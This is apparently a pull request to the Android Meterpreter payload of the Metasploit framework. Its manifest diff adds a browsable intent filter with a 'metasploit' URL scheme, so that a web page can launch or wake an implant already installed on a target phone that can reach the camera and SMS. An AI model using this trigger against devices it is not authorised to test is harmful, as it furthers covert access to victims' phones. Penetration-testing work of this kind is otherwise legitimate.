### PR TITLE
Allow Android Meterpreter to be launched from a browser

### DIFF
--- a/java/androidpayload/app/AndroidManifest.xml
+++ b/java/androidpayload/app/AndroidManifest.xml
@@ -23,7 +23,6 @@
     <uses-permission android:name="android.permission.WRITE_SETTINGS" />
     <uses-permission android:name="android.permission.CAMERA" />
     <uses-permission android:name="android.permission.READ_SMS" />
-    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
 
     <application
         android:label="@string/app_name" >
@@ -33,8 +32,13 @@
             android:label="@string/app_name" >
             <intent-filter>
                 <action android:name="android.intent.action.MAIN" />
-
                 <category android:name="android.intent.category.LAUNCHER" />
+            </intent-filter>
+            <intent-filter>
+                <data android:scheme="metasploit" android:host="my_host" />
+                <category android:name="android.intent.category.DEFAULT" />
+                <category android:name="android.intent.category.BROWSABLE" />
+                <action android:name="android.intent.action.VIEW" />
             </intent-filter>
         </activity>
     </application>


### PR DESCRIPTION
This patch assumes the target already has an android meterpreter
installed, and you can launch/wake it with a browser.